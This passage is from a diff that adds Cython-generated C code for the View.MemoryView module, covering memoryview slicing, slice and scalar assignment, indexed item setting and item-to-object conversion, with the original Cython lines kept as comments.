__pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.__setitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_have_slices); + __Pyx_XDECREF(__pyx_v_obj); + __Pyx_XDECREF(__pyx_v_index); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":435 + * self.setitem_indexed(index, value) + * + * cdef is_slice(self, obj): # <<<<<<<<<<<<<< + * if not isinstance(obj, memoryview): + * try: + */ + +static PyObject *__pyx_memoryview_is_slice(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_slice", 0); + __Pyx_INCREF(__pyx_v_obj); + + /* "View.MemoryView":436 + * + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): # <<<<<<<<<<<<<< + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + */ + __pyx_t_1 = __Pyx_TypeCheck(__pyx_v_obj, __pyx_memoryview_type); + __pyx_t_2 = (!__pyx_t_1); + if (__pyx_t_2) { + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_4, &__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_5); + /*try:*/ { + + /* "View.MemoryView":438 + * if not isinstance(obj, memoryview): + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, # <<<<<<<<<<<<<< + * self.dtype_is_object) + * except TypeError: + */ + __pyx_t_6 = __Pyx_PyInt_From_int(((__pyx_v_self->flags & (~PyBUF_WRITABLE)) | PyBUF_ANY_CONTIGUOUS)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_6); + + /* "View.MemoryView":439 + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) # <<<<<<<<<<<<<< + * except TypeError: + * return None + */ + __pyx_t_7 = __Pyx_PyBool_FromLong(__pyx_v_self->dtype_is_object); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 439, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_7); + + /* "View.MemoryView":438 + * if not isinstance(obj, memoryview): + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, # <<<<<<<<<<<<<< + * self.dtype_is_object) + * except TypeError: + */ + __pyx_t_8 = PyTuple_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_INCREF(__pyx_v_obj); + __Pyx_GIVEREF(__pyx_v_obj); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_v_obj); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_8, 2, __pyx_t_7); + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_8, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF_SET(__pyx_v_obj, __pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + goto __pyx_L9_try_end; + __pyx_L4_error:; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* "View.MemoryView":440 + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + * except TypeError: # <<<<<<<<<<<<<< + * return None + * + */ + __pyx_t_9 = __Pyx_PyErr_ExceptionMatches(__pyx_builtin_TypeError); + if (__pyx_t_9) { + __Pyx_AddTraceback("View.MemoryView.memoryview.is_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_7, &__pyx_t_8, &__pyx_t_6) < 0) __PYX_ERR(1, 440, __pyx_L6_except_error) + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_6); + + /* "View.MemoryView":441 + * self.dtype_is_object) + * except TypeError: + * return None # <<<<<<<<<<<<<< + * + * return obj + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L7_except_return; + } + goto __pyx_L6_except_error; + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + __pyx_L6_except_error:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_XGIVEREF(__pyx_t_5); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_4, __pyx_t_5); + goto __pyx_L1_error; + __pyx_L7_except_return:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_XGIVEREF(__pyx_t_5); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_4, __pyx_t_5); + goto __pyx_L0; + __pyx_L9_try_end:; + } + + /* "View.MemoryView":436 + * + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): # <<<<<<<<<<<<<< + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + */ + } + + /* "View.MemoryView":443 + * return None + * + * return obj # <<<<<<<<<<<<<< + * + * cdef setitem_slice_assignment(self, dst, src): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_obj); + __pyx_r = __pyx_v_obj; + goto __pyx_L0; + + /* "View.MemoryView":435 + * self.setitem_indexed(index, value) + * + * cdef is_slice(self, obj): # <<<<<<<<<<<<<< + * if not isinstance(obj, memoryview): + * try: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_obj); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":445 + * return obj + * + * cdef setitem_slice_assignment(self, dst, src): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + */ + +static PyObject *__pyx_memoryview_setitem_slice_assignment(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_dst, PyObject *__pyx_v_src) { + __Pyx_memviewslice __pyx_v_dst_slice; + __Pyx_memviewslice __pyx_v_src_slice; + __Pyx_memviewslice __pyx_v_msrc; + __Pyx_memviewslice __pyx_v_mdst; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_t_3; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_slice_assignment", 0); + + /* "View.MemoryView":448 + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + * cdef __Pyx_memviewslice msrc = get_slice_from_memview(src, &src_slice)[0] # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] + * + */ + if (!(likely(((__pyx_v_src) == Py_None) || likely(__Pyx_TypeTest(__pyx_v_src, __pyx_memoryview_type))))) __PYX_ERR(1, 448, __pyx_L1_error) + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(((struct __pyx_memoryview_obj *)__pyx_v_src), (&__pyx_v_src_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 448, __pyx_L1_error) + __pyx_v_msrc = (__pyx_t_1[0]); + + /* "View.MemoryView":449 + * cdef __Pyx_memviewslice src_slice + * cdef __Pyx_memviewslice msrc = get_slice_from_memview(src, &src_slice)[0] + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] # <<<<<<<<<<<<<< + * + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + */ + if (!(likely(((__pyx_v_dst) == Py_None) || likely(__Pyx_TypeTest(__pyx_v_dst, __pyx_memoryview_type))))) __PYX_ERR(1, 449, __pyx_L1_error) + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(((struct __pyx_memoryview_obj *)__pyx_v_dst), (&__pyx_v_dst_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 449, __pyx_L1_error) + __pyx_v_mdst = (__pyx_t_1[0]); + + /* "View.MemoryView":451 + * cdef __Pyx_memviewslice mdst = get_slice_from_memview(dst, &dst_slice)[0] + * + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) # <<<<<<<<<<<<<< + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_src, __pyx_n_s_ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyInt_As_int(__pyx_t_2); if (unlikely((__pyx_t_3 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_dst, __pyx_n_s_ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyInt_As_int(__pyx_t_2); if (unlikely((__pyx_t_4 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 451, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_5 = __pyx_memoryview_copy_contents(__pyx_v_msrc, __pyx_v_mdst, __pyx_t_3, __pyx_t_4, __pyx_v_self->dtype_is_object); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 451, __pyx_L1_error) + + /* "View.MemoryView":445 + * return obj + * + * cdef setitem_slice_assignment(self, dst, src): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice dst_slice + * cdef __Pyx_memviewslice src_slice + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_slice_assignment", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":453 + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): # <<<<<<<<<<<<<< + * cdef int array[128] + * cdef void *tmp = NULL + */ + +static PyObject *__pyx_memoryview_setitem_slice_assign_scalar(struct __pyx_memoryview_obj *__pyx_v_self, struct __pyx_memoryview_obj *__pyx_v_dst, PyObject *__pyx_v_value) { + int __pyx_v_array[0x80]; + void *__pyx_v_tmp; + void *__pyx_v_item; + __Pyx_memviewslice *__pyx_v_dst_slice; + __Pyx_memviewslice __pyx_v_tmp_slice; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + char const *__pyx_t_6; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_slice_assign_scalar", 0); + + /* "View.MemoryView":455 + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): + * cdef int array[128] + * cdef void *tmp = NULL # <<<<<<<<<<<<<< + * cdef void *item + * + */ + __pyx_v_tmp = NULL; + + /* "View.MemoryView":460 + * cdef __Pyx_memviewslice *dst_slice + * cdef __Pyx_memviewslice tmp_slice + * dst_slice = get_slice_from_memview(dst, &tmp_slice) # <<<<<<<<<<<<<< + * + * if self.view.itemsize > sizeof(array): + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_dst, (&__pyx_v_tmp_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 460, __pyx_L1_error) + __pyx_v_dst_slice = __pyx_t_1; + + /* "View.MemoryView":462 + * dst_slice = get_slice_from_memview(dst, &tmp_slice) + * + * if self.view.itemsize > sizeof(array): # <<<<<<<<<<<<<< + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + */ + __pyx_t_2 = (((size_t)__pyx_v_self->view.itemsize) > (sizeof(__pyx_v_array))); + if (__pyx_t_2) { + + /* "View.MemoryView":463 + * + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) # <<<<<<<<<<<<<< + * if tmp == NULL: + * raise MemoryError + */ + __pyx_v_tmp = PyMem_Malloc(__pyx_v_self->view.itemsize); + + /* "View.MemoryView":464 + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * item = tmp + */ + __pyx_t_2 = (__pyx_v_tmp == NULL); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":465 + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + * raise MemoryError # <<<<<<<<<<<<<< + * item = tmp + * else: + */ + PyErr_NoMemory(); __PYX_ERR(1, 465, __pyx_L1_error) + + /* "View.MemoryView":464 + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * item = tmp + */ + } + + /* "View.MemoryView":466 + * if tmp == NULL: + * raise MemoryError + * item = tmp # <<<<<<<<<<<<<< + * else: + * item = array + */ + __pyx_v_item = __pyx_v_tmp; + + /* "View.MemoryView":462 + * dst_slice = get_slice_from_memview(dst, &tmp_slice) + * + * if self.view.itemsize > sizeof(array): # <<<<<<<<<<<<<< + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":468 + * item = tmp + * else: + * item = array # <<<<<<<<<<<<<< + * + * try: + */ + /*else*/ { + __pyx_v_item = ((void *)__pyx_v_array); + } + __pyx_L3:; + + /* "View.MemoryView":470 + * item = array + * + * try: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * ( item)[0] = value + */ + /*try:*/ { + + /* "View.MemoryView":471 + * + * try: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * ( item)[0] = value + * else: + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":472 + * try: + * if self.dtype_is_object: + * ( item)[0] = value # <<<<<<<<<<<<<< + * else: + * self.assign_item_from_object( item, value) + */ + (((PyObject **)__pyx_v_item)[0]) = ((PyObject *)__pyx_v_value); + + /* "View.MemoryView":471 + * + * try: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * ( item)[0] = value + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":474 + * ( item)[0] = value + * else: + * self.assign_item_from_object( item, value) # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_t_3 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->assign_item_from_object(__pyx_v_self, ((char *)__pyx_v_item), __pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 474, __pyx_L6_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_L8:; + + /* "View.MemoryView":478 + * + * + * if self.view.suboffsets != NULL: # <<<<<<<<<<<<<< + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + */ + __pyx_t_2 = (__pyx_v_self->view.suboffsets != NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":479 + * + * if self.view.suboffsets != NULL: + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) # <<<<<<<<<<<<<< + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + * item, self.dtype_is_object) + */ + __pyx_t_4 = assert_direct_dimensions(__pyx_v_self->view.suboffsets, __pyx_v_self->view.ndim); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(1, 479, __pyx_L6_error) + + /* "View.MemoryView":478 + * + * + * if self.view.suboffsets != NULL: # <<<<<<<<<<<<<< + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + */ + } + + /* "View.MemoryView":480 + * if self.view.suboffsets != NULL: + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, # <<<<<<<<<<<<<< + * item, self.dtype_is_object) + * finally: + */ + __pyx_memoryview_slice_assign_scalar(__pyx_v_dst_slice, __pyx_v_dst->view.ndim, __pyx_v_self->view.itemsize, __pyx_v_item, __pyx_v_self->dtype_is_object); + } + + /* "View.MemoryView":483 + * item, self.dtype_is_object) + * finally: + * PyMem_Free(tmp) # <<<<<<<<<<<<<< + * + * cdef setitem_indexed(self, index, value): + */ + /*finally:*/ { + /*normal exit:*/{ + PyMem_Free(__pyx_v_tmp); + goto __pyx_L7; + } + __pyx_L6_error:; + /*exception exit:*/{ + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __pyx_t_7 = 0; __pyx_t_8 = 0; __pyx_t_9 = 0; __pyx_t_10 = 0; __pyx_t_11 = 0; __pyx_t_12 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (PY_MAJOR_VERSION >= 3) __Pyx_ExceptionSwap(&__pyx_t_10, &__pyx_t_11, &__pyx_t_12); + if ((PY_MAJOR_VERSION < 3) || unlikely(__Pyx_GetException(&__pyx_t_7, &__pyx_t_8, &__pyx_t_9) < 0)) __Pyx_ErrFetch(&__pyx_t_7, &__pyx_t_8, &__pyx_t_9); + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_9); + __Pyx_XGOTREF(__pyx_t_10); + __Pyx_XGOTREF(__pyx_t_11); + __Pyx_XGOTREF(__pyx_t_12); + __pyx_t_4 = __pyx_lineno; __pyx_t_5 = __pyx_clineno; __pyx_t_6 = __pyx_filename; + { + PyMem_Free(__pyx_v_tmp); + } + if (PY_MAJOR_VERSION >= 3) { + __Pyx_XGIVEREF(__pyx_t_10); + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_ExceptionReset(__pyx_t_10, __pyx_t_11, __pyx_t_12); + } + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_XGIVEREF(__pyx_t_8); + __Pyx_XGIVEREF(__pyx_t_9); + __Pyx_ErrRestore(__pyx_t_7, __pyx_t_8, __pyx_t_9); + __pyx_t_7 = 0; __pyx_t_8 = 0; __pyx_t_9 = 0; __pyx_t_10 = 0; __pyx_t_11 = 0; __pyx_t_12 = 0; + __pyx_lineno = __pyx_t_4; __pyx_clineno = __pyx_t_5; __pyx_filename = __pyx_t_6; + goto __pyx_L1_error; + } + __pyx_L7:; + } + + /* "View.MemoryView":453 + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): # <<<<<<<<<<<<<< + * cdef int array[128] + * cdef void *tmp = NULL + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_slice_assign_scalar", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":485 + * PyMem_Free(tmp) + * + * cdef setitem_indexed(self, index, value): # <<<<<<<<<<<<<< + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) + */ + +static PyObject *__pyx_memoryview_setitem_indexed(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + char *__pyx_v_itemp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + char *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_indexed", 0); + + /* "View.MemoryView":486 + * + * cdef setitem_indexed(self, index, value): + * cdef char *itemp = self.get_item_pointer(index) # <<<<<<<<<<<<<< + * self.assign_item_from_object(itemp, value) + * + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->get_item_pointer(__pyx_v_self, __pyx_v_index); if (unlikely(__pyx_t_1 == ((char *)NULL))) __PYX_ERR(1, 486, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_1; + + /* "View.MemoryView":487 + * cdef setitem_indexed(self, index, value): + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) # <<<<<<<<<<<<<< + * + * cdef convert_item_to_object(self, char *itemp): + */ + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->assign_item_from_object(__pyx_v_self, __pyx_v_itemp, __pyx_v_value); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 487, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":485 + * PyMem_Free(tmp) + * + * cdef setitem_indexed(self, index, value): # <<<<<<<<<<<<<< + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_indexed", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":489 + * self.assign_item_from_object(itemp, value) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + +static PyObject *__pyx_memoryview_convert_item_to_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp) { + PyObject *__pyx_v_struct = NULL; + PyObject *__pyx_v_bytesitem = 0; + PyObject *__pyx_v_result = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + Py_ssize_t __pyx_t_9; + int __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("convert_item_to_object", 0); + + /* "View.MemoryView":492 + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + * import struct # <<<<<<<<<<<<<< + * cdef bytes bytesitem + * + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_struct, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 492, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_struct = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":495 + * cdef bytes bytesitem + * + * bytesitem = itemp[:self.view.itemsize] # <<<<<<<<<<<<<< + * try: + * result = struct.unpack(self.view.format, bytesitem) + */ + __pyx_t_1 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_itemp + 0, __pyx_v_self->view.itemsize - 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 495, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_bytesitem = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_2, &__pyx_t_3, &__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_4); + /*try:*/ { + + /* "View.MemoryView":497 + * bytesitem = itemp[:self.view.itemsize] + * try: + * result = struct.unpack(self.view.format, bytesitem) # <<<<<<<<<<<<<< + * except struct.error: + * raise ValueError, "Unable to convert item to object" + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_unpack); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_7, __pyx_t_6, __pyx_v_bytesitem}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_8, 2+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_1); + 